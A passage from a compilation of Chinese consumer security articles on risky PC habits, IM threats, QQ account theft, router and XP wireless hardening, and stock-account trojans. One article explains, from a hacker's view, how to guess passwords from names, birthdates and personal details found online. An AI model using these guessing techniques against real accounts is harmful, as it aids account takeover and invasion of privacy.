您只能在确信附件来源可靠并且您知道是什么内容的情况下才可以打开附件。即使带有附件的邮件看起来似乎来自你可以信任的人，也有可能是某些人将他们的地址伪装成这样， 甚至是发件人的电脑已经感染了病毒，在他们不知情的情况下发送了附件。

7、点击所有链接

打开附件不是鼠标所能带给您的唯一麻烦。点击电子邮件或者网页上的超级链接能将您带入植入ActiveX控制或者脚本的网页，利用这些就可能进行各种类型的恶意行为，如清除硬 盘，或者在计算机上安装后门软件，这样黑客就可以潜入并夺取控制权。

点错链接也可能会带您进入具有色情图片，盗版音乐或软件等不良内容的网站。如果您使用的是工作电脑可能会因此麻烦缠身，甚至惹上官司。

请不要向“点击狂燥症”屈服。在点击链接之前请务必考虑一下。有些链接可能被伪装在网络钓鱼信息或者那些可能将你带到别的网站的网页里。例如，链接地址可能是 www.safesite.com，但是实际上会指向www.gotcha.com。一般情况下，您可以用鼠标在链接上滑过而不要点击，就可以看到实际的URL。

8、共享或类似共享的行为

老师教导我们分享是一种良好的行为，但是在网络上，分享则可能将你暴露在危险之中。如果您允许文件和打印机共享，别人就可以远程与您的电脑连接，并访问您的数据。即使 您没有设置共享文件夹，在默认情况下，Windows系统会隐藏每块磁盘根目录上可管理的共享。一个黑客高手有可能利用这些共享侵入您的电脑。解决方法之一就是，如果您不需要 网络访问您电脑上的任何文件，就请关闭文件和打印机共享。如果您是通过公用无线热点上使用笔记本进行连接，这个建议非常重要。

如果你确实需要共享某些文件夹，请务必通过共享级许可和文件级(NTFS)许可对文件夹进行保护。另外还要确保您的帐号和本地管理帐号的密码足够安全。

9、用错密码

这也是使得我们暴露在入侵者面前的又一个常见错误：用错密码。即使您的网络环境中没有管理员强迫您选择强大的密码并定期更换，您也应该这样做。不要选用容易被猜中的密 码，如您的生日，爱人的名字，社会保险号码等。密码越长越不容易被破解，因此您的密码至少为8位，14位就更好。常用的密码破解方法采用“字典”破解法，因此不要使用字典 中能查到的单词做为密码。为安全起见，密码应该由字母、数字以及符号组合而成。

很长的无意义的字符串密码很难被破解，但是如果你因为记不住密码而不得不将密码写下来的话，就违背了设置密码的初衷，因为入侵者可能会找到密码。可以造一个容易记住的 短语，并使用每个单词的第一个字母，以及数字和符号生成一个密码。例如，使用“My cat ate a mouse on the 5th day of June”可以得到密码“Mc8amot5doJ。”

10、忽视对备份和恢复计划的需要

即使您听取了所有的建议，入侵者依然可能弄垮您的系统，您的数据可能遭到篡改，或因硬件问题而被擦除。因此备份重要信息，制定系统故障时的恢复计划具有相当重要的地位。

大部分计算机用户都知道应该备份，但是许多用户从来都不进行备份，或者最初做过备份但是从来都不定期对备份进行升级。使用内置的Windows备份程序(Windows NT, 2000, 及XP 中内置的Ntbackup.exe)或者第三方备份程序以及可以自动进行备份的定期备份程序。所备份的数据应当保存在网络服务器或者远离计算机自身的可移动驱动器中，以防止洪水、火 灾以及龙卷风等灾难情况的发生。

请牢记数据是您计算机上最重要的东西。操作系统和应用都可以重新安装，但是重建原始数据则是难度很高甚至根本无法完成的任务。

尽管如此，备份系统信息也可以节省时间，减少受挫。你可以使用常用的ghost或者克窿程序创建磁盘镜像。这样就可以快速恢复系统，而无需经过冗长乏味的安装过程。

维修电脑种下“木马”偷拍邻居隐私被罚

黑龙江省黑河市一居民在帮助邻居维修电脑时，暗中种下“木马”程序，通过远程控制偷拍其夫妻隐私。目前，此人已被派出所处以行政罚款５００元。

５月８日，黑河市花园街居民孙某来到花园边防派出所报案，称被他人偷拍夫妻生活隐私。经调查，李某承认了自己的违法事实，并供认了作案过程。李某今年３０岁，是黑河市花园街居民，熟悉电脑。孙某（女）与李某居住在同一住宅楼，两人平日熟识并经常在网络上聊天。

５月４日，孙某让李某帮忙维修电脑，李借维修之机暗中在孙的电脑上设置了远程操控的“木马”程序，将视频摄像头对准孙家的双人床，并说摄像头的位置不能移动，否则电脑会出故障。

此后的几天，李在家里通过摄像头窥视孙家的隐私，有两次孙移动了摄像头，李便告诉孙某，因摄像头位置移动，电脑无法正常工作，同时进行远程干扰。对电脑知识一无所知的孙信以为真，再也不敢移动摄像头的位置。

李通过摄像头拍摄了孙某夫妻生活的画面，存在电脑中。５月７日晚，李某给孙某发来两张图片，胁迫孙某与之裸聊，孙立即到公安机关报案。

聊天的危险 看即时通讯常见安全问题

聊天的危险　看即时通讯常见安全问题

作者：中国电脑教育报-红狼　来源：赛迪网

即时通讯工具（Instant Message）简称IM，是目前使用最为普遍的网络应用之一。继QQ的小企鹅图标以惊人的速度出现在我们的计算机上之后，网易、新浪、搜狐等知名厂商也迫不及待地加入这场如火如荼的竞争，而微软、雅虎、AOL这些国际巨头，也一刻没有停止他们扩张的脚步。

即时通讯平台真正在全球范围内拉近了人与人的距离，无论对于个人用户还是企业用户，都成为一种不可或缺的交流工具。现今的即时通讯工具不仅能够实现文字聊天，而且能够在两台计算机之间传送文件以及进行音频和视频等方式的通信。

正是因为即时通讯应用的高速普及和广受欢迎，使得安全攻击获得了拥有了极大的发展空间和破坏能力。丰富的功能是即时通讯吸引用户的主要手段之一，但从安全的角度来讲，功能的丰富化恰恰是与严格的安全准则背道而驰的。作为一种为了最大化沟通能力而存在的应用系统，其认证机制和保护手段是相对比较薄弱的，这很容易为恶意攻击行为所利用。下面让我们分几个方面来逐一认识即时通讯应用系统所面临的安全问题。

IM系统自身的问题

在我们讨论其它问题之前，首先来看一下即时通讯系统本身如果遭遇攻击可能会带来哪些破坏。首先是即时通讯的基础设施，比如存储所有传输数据和通信记录的服务器，一旦被攻破，成百上千万用户的记录将暴露在攻击者的面前。尽管所有的即时通讯服务商都提醒其的用户不要利用即时通讯传输敏感信息，但是这些记录中仍然会包含大量的密码和重要资讯。除了服务商的服务器之外，用户的个人电脑也存储着大量该类信息。

相对于服务端比较正式的安全防范，个人电脑中的数据被窃取的可能性往往更大。而信息的被窃不仅仅会给用户带来经济上的损失，同样需要我们关注的是所造成的隐私危机。除了通讯两端的安全风险之外，由于即时通讯工具通常使用弱加密甚至不加密的数据传输方式，所以网络窃听活动也会给即时通讯系统造成很大的威胁。

利用IM系统传播的病毒

近年来病毒的发展趋势主要是通过Internet传播的网络蠕虫。即时通讯自身具备完善的联系人列表，为蠕虫病毒传播提供了很好的传染目标获取机制。而即时通讯用户之间较高的信任程度，又无形中为病毒传播提供了社交工程方面的基础。现在通过感染即时通讯系统实现传播的病毒主要呈现出以下几类形态：以占用系统资源、破坏目标系统及种植木马为行为，例如MSN“性感鸡”病毒；窃取即时通讯系统账号密码及相关信息的病毒，比如QQ密码结巴等窃取QQ密码的木马；利用感染的即时通讯系统发送各种消息的病毒，QQ尾巴就是这类病毒的代表，也是较早在即时通讯平台上流行的病毒。

即时通讯病毒正在高速增长，很可能会在不远的将来发展到和电子邮件病毒一样严重的地步。要控制这种局势，首先需要即时通讯厂商充分重视即时通讯软件的安全问题，对其产品进行更严格的安全设计。同时，安全领域的供应商也应该积极行动，以更快的速度应对即时通讯安全事件，并研发出能够更好与即时通讯系统集成的防护产品，例如嵌入到即时通讯软件中并且可以保持更新的防病毒组件。

利用IM破坏防御系统

类似防火墙这样常见的安全防御设备，很多时候会因为即时通讯工具的存在而被突破，这类情况对企业用户的损害尤其严重。大多数即时通信软件都允许用户选择使用的端口，或者能够自动尝试可以进行通信的端口，甚至利用某些机制绕过防火墙。在这种情况下防火墙就失去了其应有的保护作用，并且这些穿越防火墙的通讯很可能会被攻击者利用以突破防火墙，对防火墙所保护的网络和计算机造成破坏。

在企业环境中，即时通讯的应用总是个两难问题。在充分的应用即时通讯为企业提高效率和限制员工使用即时通讯工具中间做出选择，往往导致两种极端的结果，即对即时通讯放任自流和完全禁止企业的即时通讯应用。也许更适合的手段是找到一种折衷的方案，例如我们可以在防御系统中过滤文件传输，而不要整个将即时通讯划为非法应用。

对IM发起拒绝服务攻击

拒绝服务攻击特别是分布式拒绝服务攻击可以说是互联网先天性安全能力不足的一个例证。即时通讯服务商本身就面临着拒绝服务攻击的威胁。由于即时通讯服务商提供的用户服务能力通常要小于总用户数，所以在相对满载的时候，攻击者较易实施拒绝服务攻击。通过发送通过发送畸形的或者模拟的数据包到即时通讯服务器，可以大量消耗服务器的资源，造成服务瘫痪。

另外，即时通讯客户端软件也存在很多可能引发拒绝服务攻击的漏洞，使安装了即时通讯软件的机器遭受拒绝服务攻击。客户端的一个隐忧是用户现在通常是为了功能对即时通讯客户端进行升级，而很少象针对操作系统的安全问题那样及时更新补丁。这使得存在即时通讯漏洞的计算机数量相当可观，当然这和厂商的推广方式有很大的关联。

IM的网络钓钩

继利用电子邮件和网站等方式开展网络钓鱼之后，以即时通讯作为诱骗手段的网络钓鱼行为正越来越多的被诈骗者们实施。比较常见的手法是利用即时通讯发送消息将用户导向陷阱以及冒充即时通讯供应商开展某种活动骗取用户的敏感信息等等。例如雅虎就曾经证实其即时通讯工具雅虎通的用户曾经接收到类似的诱骗信息，将用户导向诈骗者的网站；而国内也曾发现过很多以赠送Q币为名获取QQ密码和传播恶意代码的网站。

除了以上行为之外，即时通讯应用的匿名特征使其也成为了各种骚扰行为的温床，大量的即时通讯用户都收到过一些自身不想收到的甚至给自己带来侮辱和困扰的信息。面对这类安全问题，需要即时通讯用户能更充分的认识即时通讯应用所具有的风险，以更高的警惕性约束自己的行为。

IM的明天

即时通讯系统仍处于高速发展之中，很可能明天就会涌现出新的安全问题，有新的攻击手段被设计出来。包括用户、即时通讯服务商及相关厂商全体，都应该以积极的态度去面对这种形势，并履行自己的职责，以保证即时通讯应用在更健康的状态下成长。

获取暴利 黑客自曝偷QQ号日进千元

qq号码被盗后，失主被告知要花10元钱赎回，对方表示通过这种方式可以日入千元。

　　一周没上网qq号密码被改

　　网友回格一周没上网，当她10月5日输入密码想登录qq，可密码输了十多次都不对，她登录不常用的号码后发现，用了3年的号码呈在线状态。

　　回格向被盗的号码发送信息，想要回号码，对方回复她：“如想要回号码，请加××××××××(号码)详谈。”

　　当回格在qq上加了对方提供的号码后，对方要她向一个银行账号汇入10元钱，只要钱到位，就能得到被更改了的qq密码。

　　qq号贩”一天赚1000元

　　记者根据回格提供的qq号，以购回被盗qq号为由联系到了“永恒的转动”。对方ip地址显示为湖北荆州。

　　据“永恒的转动”说，他专做网上qq号批发生意，别人盗取qq号后，以每个2元到3元卖给他，然后他告知失主以10元购回，“不包括马上要卖出去的，有几百个号”。

　　“有些黑客在网吧等公共场所的电脑上设置木马程序，大批盗qq号。以前，网吧数量多，一天下来盗100个号没问题。我一天光从他们手中就能买三四百个，好的时候能卖出去200多个，至少100多个，现在一天卖出几十个，收入1000块不成问题。”

　　由于怕被查，“永恒的转动”用的qq号经常换。

　　“杀毒软件杀不了所有病毒”

　　据腾讯公司客户服务中心的工作人员说，最近他们经常收到用户投诉qq号被盗。通过调查，他们得知大多数被盗的号码曾在网吧登录过，并且没有申请密码保护，但像回格遇到的用钱赎号的情况他们是第一次听说。另外，腾讯公司提供的杀毒软件杀不了所有病毒。

保护无线路由器 消灭来自无形中的威胁

保护无线路由器　消灭来自无形中的威胁

作者：茫然的风　来源：赛迪网

路由器是局域网与Internet之间最重要的网络互联设备。可以这样说，没有路由器就没有互联网。互联网迅速发展，使得小型无线局域网络悄然兴起，用户可以在网上办公、购物等，享受互联网带来的便捷和愉快。不过，就我们享受网络所带来的这些优越性时，包括黑客在内的恶意用户会利用各种手段窃取各种敏感信息，如银行账号、口令等。印度大学的计算机科学系的研究者们最近发布了一份调查报告，其中概括了黑客访问、篡改家庭网络路由器配置的情况，描述了黑客怎样用嵌入到Web页面中的JavaScript登录到路由器超级用户账户，并修改其DNS配置的阴险伎俩。

一旦路由器连接了被黑客控制的DNS服务器，此路由器就可以被用作一个各种恶意需要的跳板，从恶意软件感染到通过“钓鱼”进行用户身份窃取等都会发生。印度大学的报告指出这种攻击并不利用任何浏览器的漏洞，而且，更重要的是，它看起来几乎在任何路由器上都能正常工作，不管什么牌子或型号。

更为有趣的是，这种黑客行为只有在目标路由器的默认管理员口令采用的仍是厂家默认配置的情况下发生。换句话说，只要用户简单地改变了默认口令，用户就会受到保护，因为攻击依赖于这种大家熟知的设备厂商提供的默认口令。

实际上有很多路由器仍采用这种默认口令。其实，许多自动配置的路由器向导并不提示用户修改默认的管理员口令，大多数路由器厂商将设置方法放在菜单中一个不为人注意的地方。这易于造成用户对默认口令疏于管理与改变。

这种特定的攻击情况表明，哪怕是一种看似次要的局部的设置，仍会对安全产生深远的影响。因此，有必要检查一些具体措施，使我们可以确信有线或无线路由器——甚至进一步讲——我们的网络可以达到尽可能的安全。

修改路由器的管理员口令

如前所述，如果你的路由器的口令为"password"、 "admin" 、"1234"或任何其它的默认口令，那你简直就是在自寻烦恼，赶快修改吧！

修改默认的SSID

正如许多用户忽视了修改路由器的口令一样，许多用户还可能保持着默认的无线网络SSID。SSID/ESSID（Service Set Identifier）即“服务组标识符”， 用来区分不同的网络，最多允许有32个字符。无线网卡设置了不同的SSID就可以进入不同网络，SSID通常由访问点广播出来。不过，SSID几乎总可以指明或预示着设备制造商的名称，从而可以推断出其它信息。请放弃使用默认的SSID吧，创建一个自己的SSID，不过要避免使用如家庭住址、生日或姓名等。

关闭SSID广播

广播SSID可将新的无线设备很轻松地连接到你的网络中。但这会将你的网络广播给任何经过无线通信区域的“过路人”，这绝对不是个好主意。关闭这个特性并不会绝对地隐藏你的存在，特别是对那些使用特殊软件的、坚决的闯入者来说更是这样。但是，有越少的人知道你的信息，情况就对你越有利。其实，只要你知道自己的SSID，在设置新设备时你就不会有任何麻烦。

使用WPA勿用WEP

近年来，虽然WEP的脆弱性已被多种文档广泛记载，很多公司仍在使用它，并且它在某些设备上还是默认的加密方法。实际上，至今仍有一些无线产品（大多数是非PC设备，如流媒体设备）尚未支持WPA而只支持WEP。

请记住：最基本的要求是要使用WPA对你的无线网络进行加密，要避免购买或使用那种强迫你使用WEP去适应它的设备。使用WPA，除了可以极大地提升 安全性之外，还会有极好的适应性。因为它不像WEP那样需要在ASCII或HEX之间选择，而且加密密钥也不需要遵守特定的长度规定（WEP 数据加密可使用 64 位或 128 位配置，128位的WEP必须严格限制使用13或26个字符等等。）。

减少无线设备的功率

如果你的路由器支持的话，请你适当地调低你的无线设备的功率设置，尽力保持信号在你的办公室或住宅的范围之内。调整过程中可能会差错，那就多试验几次。虽然精确控制信号的传播范围也许有点儿困难，但你却可以将散布到大街上或邻居家去的信号数量最小化。但你的WLAN可能会更加安全，何乐而不为？

禁用或减少DHCP的使用

DHCP自动化地分配IP地址的功能是极为方便的，特别是当你有多个系统需要管理的时候。但请记住DHCP会“愉快”地给那些要求IP地址的任何系统可用的IP地址。如果你只有数量有限的设备，那就请关闭DHCP功能吧。不妨给设备分配静态的IP地址，这样就会给未授权的用户在获取你的网络合法IP地址的时候增加难度。

另一个方法是启用DHCP但要减少地址池的大小。大多数路由器将几乎所有可用的地址（一般总共要超过250个）都放在地址池中。实际上，这些IP地址的总数大都远远超过了无线网络所需要的数量，这会为未授权用户留下大量的地址空间。用户应该将可用的DHCP地址数量限制为你所拥有的特定设备的数量，使你在使用IP地址的同时又能防止网络入侵者获得这些IP地址。

打开MAC过滤功能

虽然MAC地址过滤不应该用于替代无线网络的加密，不过MAC过滤可以作为加密的一个有益补充。大多数路由器都可以支持这种特性，这就能够起到限制作用：只允许拥有用户指定的MAC地址的设备可以访问网络。配置MAC地址过滤有时是一件相当枯燥无味的工作，不过幸运的是有很多路由器允许你轻松地将已连接的设备加入到过滤列表中，这就会为你节省大量时间和精力，因为你不必手动检索每一个设备的MAC地址。

确认已关闭DMZ

DMZ即“隔离区”，它是位于可信任的内部网络（如公司私有或专用的LAN）与不可信任的外部网络（如公共的Internet）之间的一台计算机或一个子网，是为了解决安装防火墙后外部网络不能访问内部网络服务器的问题，而设立的一个非安全系统与安全系统之间的缓冲区。路由器的DMZ特性默认情况下通常是关闭的，不过用户有时为了解决故障而启用它，事后却忘了撤消。正因为DMZ代表着一个对Internet开放的IP地址，因此任何不经意放置在此的系统都将会完全暴露在风险之中。

关闭PING响应

这项设置允许路由器响应来自国际互联网的ping命令。默认情况下，ping响应也是关闭的，但你该确认一下，因为它会将你网络的一些状态信息泄露给那些潜在的黑客，这反过来会使黑客进一步探查你的网络。

避免使用远程管理

大多数路由器都有这个特性，这允许用户从网络外部进入系统并实施管理。大多数情况下，这项功能并没有什么作用，所以你应该禁用它除非你真正需要。不过，你如果真要使用远程访问的话，请将默认的端口号（它通常是8080或8888）改为一个明显较小的值。

审阅安全日志

通过无线路由器内置的防火墙功能，用户可以查阅你的路由器记录，是查出安潜在凶险的非常有效的方法。利用出网的记录，你还可以找出试图建立外部连接的特洛伊木马等恶意程序。

毋庸置疑，对于小型LAN的无线路由器来说，这些措施都是十分关键的，而且大多数配置起来相当简单。“麻雀虽小，五脏俱全”，此处介绍的措施对于我们正确配置管理大型网络的路由器也应该具有一定的指导意义。

Windows XP无线网络安全精解

早期无线网络由于自身的特殊性和设备昂贵的原因，一直没有普遍开来，因此，无线的网络安全一直也没有引起多少人的注意，随着近几年，无线网络设备的价格一降再降，终于降到了大多数人可以接受的地步，而配置一个无

线的网络也不需要具备以往的高级工程师技术，在Win XP下，只需要按照向导点击几下鼠标，用不了几分钟就可以建成一个无线网络，简易就是不安全的代名词，因此，无线网络的安全也越来越被人们所关注。

目前无线网络的主要风险体现在服务盗用、数据盗取，数据破坏、干扰正常服务几个方面，这些在XP的无线网络里同样存在。为避免安全风险的威胁，我们将逐一进行分析。

还是应了上面的那句话：“简易就是不安全的代名词”，XP的无线安全风险的最大因素，恰恰是来自于XP最简单易用的功能——“无线零配置”(WIRELESS? ZERO? CONFIGURATION)，由于接入点可以自动发送接收信号，因此XP客户端一旦进入了无线网络信号的覆盖范围，就可以自动建立连接，如果进入了多个无线网络的信号覆盖范围，系统能自动与最近的接入点联系，并自动配置网卡进行连接，完成后，在“可用网络”中将出现建立的连接的SSID，由于不少厂商使用网卡的半个MAC地址来默认命名SSID，因此，使得SSID默认名可以推测，攻击者知道了默认名称后，至少连到接入点的网络是轻而易举了。

主要的针对措施有三个：

1、启用无线设备的不广播功能，不进行SSID的扩散。

这个功能需要在硬件设备的选项里寻找，启用后将封闭网络，

这个时候想连接网络的人必须提供准确的网络名，而不是XP系统自动提供的网络名。

2、使用不规则网络名，禁止使用默认名。

如果不广播了，攻击者还是可以通过猜测网络名连入网络，因此有必要修改默认名。

这里的不规则可以借鉴一下密码设置技巧，不设置具有敏感信息的网络名。

3、客户端MAC地址过滤

设定只有具有指定的MAC的客户端才可以连接接入点，可以将连入者进一步把关。

上面的三个办法只是属于XP无线安全的初级设置，不要指望设置了这三个步骤后就可以高枕无忧了，从目前的安全设置来看，虽然可以防备部分无线攻击了，但是，由于并没有对传输中的数据采取任何加密措施，因此，只要攻击者使用一些特定的无线局域网工具，就可以抓取空中的各种数据包，通过对这些数据包的内容分析，可以获得各种信息，其中就包括SSID和MAC地址，因此前面的三个办法对于这种攻击就形同虚设了。我们下一步面临的是无线传输的加密问题----WEP。

这是一个极具争议的话题，因此，为避免走入误区，我们将不对这个问题的强项和弱点一一详细解释，只一句话带过：“WEP为无线局域网提供了从数据安全性、完整性到数据来源真实性较为全面的安全性，但是WEP的密钥容易被攻击者得到”。虽然目前针对这一点厂商有所加强，微软也发布了相关的升级包(KB826942，support.microsoft.com/default.aspx?scid=kb;zh-cn;826942)， 但是不能从根本上解决这个问题。

WEP运行于接入点，如果我们是在2000上启用WEP，那么必须使用客户端软件提供的共享密钥，如果是使用的XP，就不需要了，系统会在第一次接入启用WEP的时候进行提示，输入密钥后可继续以下的配置：

1、打开“网络连接”，点击无线网卡的属性。

2、选中“首选网络”，选中或添加一个条目，然后点击属性。

3、打开“无线网络属性”后进行以下操作：

1)修改“网络名”

2)将“数据加密(WEP)”打勾

3)将“网络验证”打勾

4)选择匹配接入点的“密钥格式”(ASCII或十六进制)和“密钥长度”(40或104)。

5)需要输入正确的“网络密钥”

6)不选“自动选中密钥”。

4、保存关闭。

OK，针对XP下针对WEP的设置基本上就完成了，但是为了无线网络的更加稳固，

我们再看看其他需要

注意的安全措施：

1、网络中尽可能包含一个验证服务器。

将网络配置成所有连接请求必须先通过验证服务器的验证，

将大大提高无线网络的安全性。

2、每月修改一次WEP密钥

因为WEP有记录缺陷，所以最好每隔一段时间就修改一次WEP密钥。

3、避免有线与无线网络互联。

无线网络应该是独立的，为避免互相牵连，避免增加安全风险，应将有线与无线网络分开，至少应该在二者之间建立防火墙。

4、建立VPN验证

在接入点和网络之间再加入一台VPN服务器，这样一来攻击者可能可以接上接入点，但只是死蟹一只，进不了网络，无法对网络搞任何破坏。

5、定期维护

维护的内容是检查网络和审查日志，

检查网络可以使用一些攻击无线网络的扫描工具，

　　Netstumbler(.netstumbler.com/">www.netstumbler.com)

　　Kismet www.kismetwireless.net

审查日志的重点是审查帐户登陆事件。

最后附上Ed Bott的无线网络的检查清单：

　　1、给接入点设置一个强壮的密码。

　　2、禁用接入点的远程管理功能。

　　3、无线网络设备的固件(FirmWare)保持升级到最新。

　　4、修改接入点的网络名的默认名。

　　5、使用MAC过滤控制

　　6、启用WEP并设置强壮密码。

密码心理学 看看黑客如何来破解密码

密码心理学 看看黑客如何来破解密码

　　黑客破解不可避免要破解密码，本文不从破解技术入手，而从黑客技巧入手分析密码心理学。本文完全不涉及到具体的技术，完全是心理学、信息学内容。

　　密码心理学就是从用户的心理入手，分析对方心理，从而更快的破解出密码。掌握好可以快速破解、缩短破解时间，获得用户信息，这里说的破解都只是在指黑客破解密码，而不是软件的注册破解。

　　分析一下，主要考虑下面的心理原则：

　　一、对中国人来说，一般都没有英文名的习惯，好像笔者就没有英文名，所以中文拼音很多人用来做密码，一般人去论坛什么对方注册一个用户名，由于一般简称很容易给人家抢了，所以一般也就是用全称。好像笔者的cyh是简称一般给人家注册了，caiyihao就很少人用。这里说的是名，如果是密码，一般要倒过来考虑，一般是先从简称再全称，理由很简单：短，输入时间快。

　　二、数字也是用得很多的，笔者想用得最多的密码是：123，123456(因为一般我们的习惯是六位数字，包括银行的存折都是六位，论坛一般最低要求六位，注意这点)，试一下QQ的密码，其实不少人是这样的。特别是新手。一般人密码是三位或者是六位。下面一些也是常用的：1，11，111，123，168，1314，520(特殊意义的数字)，……

　　三、生日用得特别多，有人把存折和身份证放一起丢了，给盗贼用他的生日拿到了钱。这个是由于人们怕忘记，而自己的生日是不会忘记的，所以就用了的原因。由于上面说到的六位，所以刚刚好可以这样790102，在用户看来刚好省事，不知道：最方便就是最危险。一般人用是这样的习惯：六位就是790102，四位是7912。

　　如果那个月和日是只有一位的，也就是1～9，一般人就是用四位的，如：7632，而不是760302，如果日期是双位的，10～31，一般人也就是用到六位而不会是五位，如：760321而不是76321。如果月是双位，一般日就是双位的，如：761203，而一般不是76123。说得够罗索了吧，呵呵，总体来说也就是月和日都是同样位数的。因为这样比较美观。也有人不用日，只用到月，如：763，而对中国人来说7603用得少，因为看起来0是多余的。

四、一个做暴力破解机软件的人，只要他思考过，而且技术上能达到的话，一般破解应该按照这个顺序来：数字→字母→特殊符号。对方用户名一般不用大写字，都是小写的多。例如我就是用cyh比CYH多，而且用caiyihao而从来不用CAIYIHAO。密码就要考虑大小写。理论上也应该按照先小写再大写来。因为用户输入大写字一般人不是按shift键而是按caps lock键，所以理论上来说一般是要大写所有字母几个都大写。

　　五、做一个黑客就是要从细微入手分析用户的信息。电子邮箱入手的话可以知道一些什么呢?例如：

　　caiyihao@163.com可以知道一些什么呢?可以看出来是对方是用拼音的用户名，所以对方应该姓蔡。

　　cyh790101@163.com还可以知道一些什么呢?对方生日：790101。当然也可以从主页看出来，例如：www.caiyihao.com，很明显的。还可以由一个人昵称推知名或者姓，例如我的QQ昵称“浩”，很明显我的名有“浩”字，获得信息还有很多途径的，用得多是搜索引擎，建议最少用两个，搜可以用他的名搜，也可以用他的邮箱搜，也可以用他的文章搜等等。平时应该多一些常识，例如对方QQ上写了“广东dg”，结合地理就应该知道是“广东东莞”。

　　至于由对方聊天内容看出对方男女性别、大概多大、是否还读书、是否独生子女、在家里兄弟姐妹中排老大还是最小，这些就不是本文所要涉及的。

　　总之：细心观察；设身处地，从对方入手;动脑筋，“书是死的，人是活的”。用方法，可以不用工具就可以破解掉一些密码了。无心思细想，所以才只想到这么几点。见谅。

　　补：一般人的密码不会超过3个的，即使他有过很多个，最后也会缩小到2、3个的。而且一般人的所有邮箱密码都基本一样的，论坛注册的密码也都一样的，所以破解了一个也就可以得到很多个地方的密码了。

股民网上被黑找谁说理？ 反毒专家教你如何防范

股民网上被黑找谁说理？ 反毒专家教你如何防范

消息出自: 科技日报

本报记者 向杰

近期股票市场一路飘红，大“牛市”刺激着人们纷纷投身其中，一股新的投资热潮由此形成，每天到证券交易所要求开户的股民可谓络绎不绝，其中绝大部分选择采取网上交易。

　　“但现在互联网不安全，既想交易方便又想保证安全似乎很难做到。”在证券交易所刚刚办理完开户手续的陈伟峰表示，如何防范网上证券交易的风险是他目前最为关心的问题。

　　这些天股票行情火爆，陈伟峰身边很多同事和朋友都赚了不少，他因此也取出一部分积蓄进行投资。不过，在办理开户手续时，证券公司的工作人员首先交给他一份“风险揭示书”，上面明确指出，“进行网上交易时用户有可能会受到黑客、病毒的攻击，而因此造成的损失由用户自己承担。”通过进一步了解，陈伟峰发现，现在几乎所有的证券交易公司都不承担任何因病毒所造成的损失。对此，他不禁担忧，“万一我的钱被病毒黑了，找谁说理去？”

　　记者特意就此咨询反病毒专家、江民科技程序员何公道。他告诉记者，早在2004年，互联网上暴发的“证券大盗”病毒就造成了1000多万元的损失，为人们敲响了网络证券交易安全的警钟。随着近年来黑客技术的不断翻新，病毒更新变化速度不断加快，网上证券交易的风险越来越高，在我国相关保障措施没有出台之前，当务之急是股民加强自身防范和安全意识。

　　何公道提醒广大股民，在网上进行证券交易时应当提高警惕，防范胜于查杀，防毒才是根本。他希望人们能做到：安装使用带有“主动防御”和“隐私信息保护”功能的杀毒软件，及时为系统打好补丁，随时升级病毒库，上网时打开“实时监控”功能；将网上交易账号和密码设为隐私信息保护状态，阻止病毒向外发送信息；登录交易系统时使用软键盘，通过鼠标点击输入交易账号及密码，交易完成后，及时退出网上交易程序；如果发现网上交易有异常现象，应及时通过其他交易方式修改交易密码，暂停使用网上交易；使用类似“江民密保”等密码保护软件保护账号、密码安全，阻止病毒向外传输帐号、密码等敏感信息。

　　他强调，不要运行不明来历的邮件附件，未经确认，不要随意点击通讯上“好友”发来的不明链接，不要登录一些不良网站或是在一些小网站随意下载使用未经无毒验证的软件，定期对电脑进行全面的杀毒，从源头堵住黑客和病毒的入侵。

江民：专家提醒节后股票开市小心病毒来“操盘”

五一长假后，随着节前以3800点创下历史新高的股市开市，有金融专家预测，节后的证券市场将会持续高涨势头，股市将面临一轮新高潮。

面对持续高涨的股市行情，江民科技特在五一期间，在华东、东北等重点城市针对牛市行情对股民进行了针对性的安全宣传活动，提醒用户在节后股票开市时更应注意对“证券大盗”等病毒的防范。

江民反病毒专家介绍，每年的长假期间都是病毒最为活跃的时期，由于网上购物、网络银行的普及，使得针对证券账户、网络银行账户的病毒层出不穷，严重危及用户的财产安全。在面对股市新一轮投资热潮时，江民反病毒专家建议广大用户，在进行网上证券交易时，要严防“证券大盗”等病毒来“操盘”。

“证券大盗”是一种木马病毒（Trojan/PSW.Soufan），该木马可以盗取多家证券交易系统的交易帐户和密码，被盗号的股民帐户存在被人恶意操纵的可能。专家介绍，该病毒可能造成的危害在于，黑客可以恶意操纵被盗的股票，将某高价股票高买低卖，然后使用自己的账户将同一股票低买高卖，赚取中间的差价，给被盗股民带来巨大的损失。

专家提醒广大投资者要为节后股市开市做好充足的准备，严防被病毒“操盘”：

1、及时升级杀毒软件病毒库，对电脑系统进行全面的病毒查杀；

2、及时升级操作系统漏洞补丁，选择具有“主动防御”和“隐私信息保护”功能的杀毒软件；

3、上网时要确保打开“实时监控”、“网页监控”和“邮件监控”功能；

4、将网上交易账号和密码设为隐私信息保护状态，阻止病毒向外发送信息；

5、登录交易系统时使用软键盘，通过鼠标点击输入交易账号及密码，交易完成后应及时退出网上交易程序；

6、登录银行网站时尽量在地址栏直接输入链接地址，慎用搜索引擎；

7、如果发现网上交易有异常现象，应及时通过其他交易方式修改交易密码，暂停使用网上交易；

8、不要运行来历不明的邮件附件，未经确认不要随意点击即时通讯上“好友”发来的不明链接；

9、使用“江民密保”等密码保护软件保护账号密码安全，阻止病毒向外传输帐号、密码等敏感信息。

"五一"江民在全国开展网上证券交易安全宣传活动

五一长假期间，针对目前火爆的股市和狂热的股民，国内著名反病毒软件厂商江民科技在全国各地开展了“网上证券交易安全”宣传活动，提醒股民朋友牛市时更应小心防范“证券大盗”病毒，从而避免股市资金受到意外损失。

长假前一天，沪、深股市再创新高，其中沪市大盘指数一举突破3800点大关，专家预测节后开盘股市将迎来新一轮热潮。在目前新开户的股民中，绝大多数年青股民和上班族都通过网上证券交易系统进行网上委托交易买卖，这就给“证券大盗”等病毒带来可趁之机。

2004年被江民反病毒中心率先截获的“证券大盗”病毒先后在网上盗买盗卖股票价值上千万元。该病毒运行后，自动监控一些特定的金融证券网站页面，当病毒监测到包含“南方证券”“国泰君安”等标题的网站窗口时，就开始使用键盘钩子程序自动记录用户登陆信息，包括用户名和密码，同时，病毒还通过屏幕快照将用户登陆时窗口画面保存为图片，在记录达到一定次数后，将记录的信息和图片通过电子邮件发送给病毒作者。该病毒可能造成的危害在于，黑客可以使用盗来的帐号、密码恶意操纵被盗的股票账户，通过高买低抛的方式赚取利益，给被盗股民带来巨大的损失。更为狡猾的是，"证券大盗"病毒每次运行后即"自杀"，并删除自身在系统中留下的文件，达到消毁“罪证”的目的，“作案”手段十分隐蔽。

